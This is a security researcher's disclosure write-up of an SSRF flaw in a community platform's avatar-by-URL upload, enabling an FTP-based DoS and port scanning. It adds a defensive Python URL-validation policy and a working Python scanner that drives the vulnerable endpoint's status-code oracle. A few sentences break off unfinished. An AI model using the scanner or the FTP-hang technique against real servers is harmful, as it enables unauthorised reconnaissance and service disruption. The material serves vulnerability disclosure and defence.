SSRF (Server Side Request Forgery) causing port scan and DoS due to FTP access

The Lithium community platform, used by 400+ clients including PayPal, HP, AT&T and many more, had a functionality on community.[company].com to upload avatars and images by URL: the server fetched the image from the user-supplied URL on the user's behalf. That server-side fetch was not restricted, which caused an SSRF with severe and dangerous consequences. An attacker could scan internal and external ports, trigger 302 redirects at the server level, mount a DoS via FTP, and more.

Advisories published externally about my zero-day SSRF findings in the Lithium Community Platform:


Short description

This article is about an SSRF vulnerability that I recently found in the portal of an online helpdesk service provider; it allows port scanning and an FTP DoS attack. I was awarded for finding this. The profile image upload functionality in the user's profile accepts a remote URL, and the server-side fetch of that URL is the SSRF: through it an attacker can port scan, carry out an FTP DoS, and obtain information that should not be disclosed.

How does the vulnerability exist?
The company lets customers upload their photo or image through a URL. Whenever a server fetches a user-supplied URL, it should validate that URL first: allowed protocol, allowed destination, and a short timeout. Here two validation gaps were found.
Case 1) FTP DoS: unwanted protocols should be disabled, and only http and https should be allowed for requests to remote servers. Here the ftp:// protocol was also accepted. On top of that, the servers appear to have a very long timeout for FTP requests. An attacker can point the server at an ftp:// URL on a host that accepts the connection and never answers, so the request blocks for a prolonged time (an ftp:// fetch that effectively never times out). Enough such requests tie up the server's workers, which is a DoS.


Proof of concept for Case 1 (screenshots omitted):

Below is the upload via URL form.

Intercept the request in Burp Proxy, change the URL scheme to ftp:// (pointing at a host you control) and forward the request.

Check the incoming connection in netcat on that host.

Check the time taken by the request in Burp: 60 seconds.
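The fix for both gaps is to validate the URL before the server fetches it: allow only http/https, only standard web ports, only public destination addresses, a short timeout, and a bounded number of redirects that are each re-validated (so a 302 cannot bounce the fetch to an internal host). The block below is an added example of such a policy; it is not Lithium's code, and the port list, timeout, size cap and the test addresses are assumptions for the example. The resolver is injectable so the policy can be exercised offline with a stub.

```python
import http.client
import ipaddress
import socket
import ssl
from urllib.parse import urljoin, urlsplit

# Policy for a "fetch avatar from URL" feature.  The values are assumptions for
# this example, not the vendor's settings.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}   # avatars are expected on standard web ports only
FETCH_TIMEOUT = 5           # seconds; a stalled peer must not hold a worker for long
MAX_REDIRECTS = 3           # each hop is re-validated, so a 302 cannot bounce inward
MAX_BYTES = 2 * 1024 * 1024


class UnsafeUrl(ValueError):
    """Raised when a user-supplied URL fails the SSRF policy."""


class FetchError(Exception):
    """Raised when the remote side misbehaves after the policy passed."""


def _is_public(ip) -> bool:
    """True only for globally routable unicast addresses."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped          # ::ffff:127.0.0.1 is still loopback
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def default_resolver(host: str):
    """All A/AAAA answers for host; every one of them must pass the policy."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _port_of(parts) -> int:
    return parts.port or (443 if parts.scheme.lower() == "https" else 80)


def validate_fetch_url(url: str, resolver=default_resolver) -> str:
    """Return the vetted IP to connect to, or raise UnsafeUrl.

    The caller must connect to the returned IP (sending the original Host
    header) instead of re-resolving the name; otherwise a DNS-rebinding name
    can pass this check and then point at an internal address.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeUrl(f"scheme {parts.scheme!r} not allowed")  # rejects ftp://, file://, gopher://
    if parts.username or parts.password:
        raise UnsafeUrl("credentials in URL not allowed")
    host = parts.hostname
    if not host:
        raise UnsafeUrl("missing host")
    if _port_of(parts) not in ALLOWED_PORTS:
        raise UnsafeUrl(f"port {_port_of(parts)} not allowed")  # removes the port-scan oracle
    try:
        addresses = [str(ipaddress.ip_address(host))]   # IP literal: nothing to resolve
    except ValueError:
        addresses = resolver(host)
    if not addresses:
        raise UnsafeUrl(f"{host} does not resolve")
    for addr in addresses:
        if not _is_public(ipaddress.ip_address(addr)):
            raise UnsafeUrl(f"{host} resolves to non-public address {addr}")
    return addresses[0]


def is_allowed(url: str, resolver=default_resolver) -> bool:
    try:
        validate_fetch_url(url, resolver)
        return True
    except (UnsafeUrl, ValueError):   # ValueError: malformed port and the like
        return False


def fetch_avatar(url: str) -> bytes:
    """GET url under the policy; every redirect hop goes back through validate_fetch_url."""
    for _ in range(MAX_REDIRECTS + 1):
        ip = validate_fetch_url(url)
        parts = urlsplit(url)
        port = _port_of(parts)
        https = parts.scheme.lower() == "https"
        # Connect to the vetted IP with a bounded timeout; TLS still verifies the real name.
        sock = socket.create_connection((ip, port), timeout=FETCH_TIMEOUT)
        if https:
            sock = ssl.create_default_context().wrap_socket(sock, server_hostname=parts.hostname)
        conn_cls = http.client.HTTPSConnection if https else http.client.HTTPConnection
        conn = conn_cls(parts.hostname, port)
        conn.sock = sock                  # reuse our socket; http.client then sends Host: <name>
        path = (parts.path or "/") + (("?" + parts.query) if parts.query else "")
        conn.request("GET", path)
        resp = conn.getresponse()
        if resp.status in (301, 302, 303, 307, 308):
            url = urljoin(url, resp.getheader("Location", ""))
            conn.close()
            continue                      # the next hop is validated like the first
        data = resp.read(MAX_BYTES + 1)
        conn.close()
        if resp.status != 200:
            raise FetchError(f"remote returned {resp.status}")
        if len(data) > MAX_BYTES:
            raise FetchError("avatar too large")
        return data
    raise FetchError("too many redirects")
```

Note that the check resolves the name itself and then connects to the vetted address; validating the hostname and letting the HTTP library resolve it again leaves a window for DNS rebinding. The metadata address 169.254.169.254 is caught by the link-local test, and IPv4-mapped IPv6 literals are unwrapped before the test so they cannot be used to slip a loopback address past it.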

Case 2) Port scan:
An attacker can also use the same endpoint as a port scanner. To scan a host from the victim server, submit URLs of the form http://host:port/ and compare the server's responses; the status code tells which ports are open and which are not (see the POC for details):
For an open port the response is 200 OK
For a closed port the response is 502 or 503



The above result was validated with an nmap scan to
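The response-code oracle above can be driven as a small scanner. The block below is an added example, not tooling from the write-up: it encodes the observed mapping (200 means the back-end could connect, 502/503 means it could not), submits one URL per port, and keeps anything else as "unknown" instead of guessing. The upload endpoint, form field and cookie in the real submitter are hypothetical placeholders; a constructed fake submitter stands in for the vulnerable endpoint so the scanner runs offline.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable
from urllib.parse import urlsplit

# Mapping observed in the write-up: 200 when the server could open host:port,
# 502/503 when it could not.  Anything else is reported as "unknown".
OPEN_CODES = {200}
CLOSED_CODES = {502, 503}


def classify(status: int) -> str:
    if status in OPEN_CODES:
        return "open"
    if status in CLOSED_CODES:
        return "closed"
    return "unknown"


def scan_via_ssrf(submit: Callable[[str], int], target: str,
                  ports: Iterable[int], scheme: str = "http") -> Dict[int, str]:
    """Ask the vulnerable server to fetch target:port once per port and read the oracle."""
    results = {}
    for port in ports:
        status = submit(f"{scheme}://{target}:{port}/avatar.png")
        results[port] = classify(status)
    return results


def make_http_submitter(endpoint: str, cookie: str, field: str = "avatarUrl") -> Callable[[str], int]:
    """Real submitter.  endpoint, cookie and field are hypothetical: take them from the
    request captured in Burp.  Returns the HTTP status of the upload response."""
    def submit(url: str) -> int:
        data = urllib.parse.urlencode({field: url}).encode()
        req = urllib.request.Request(endpoint, data=data, headers={"Cookie": cookie})
        try:
            # The server's own fetch took up to 60 s in the write-up, so wait longer than that.
            with urllib.request.urlopen(req, timeout=70) as resp:
                return resp.status
        except urllib.error.HTTPError as err:   # 502/503 arrive here, not as a return
            return err.code
    return submit


# Constructed stand-in for the vulnerable endpoint (not a real server): it pretends
# that ports 22, 80 and 443 are listening on whatever host is asked for.
def fake_submitter(url: str) -> int:
    return 200 if urlsplit(url).port in {22, 80, 443} else 503


if __name__ == "__main__":
    print(scan_via_ssrf(fake_submitter, "10.0.0.5", [21, 22, 80, 443, 8080]))
```

The oracle is only as reliable as the status codes the endpoint leaks, so calibrate it against one port known to be open and one known to be closed before trusting a full sweep; the write-up did exactly that by comparing against nmap.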

For more info about SSRF:

Published by


Hey! I am a security researcher, tester and hacker. Finding bugs is my passion.
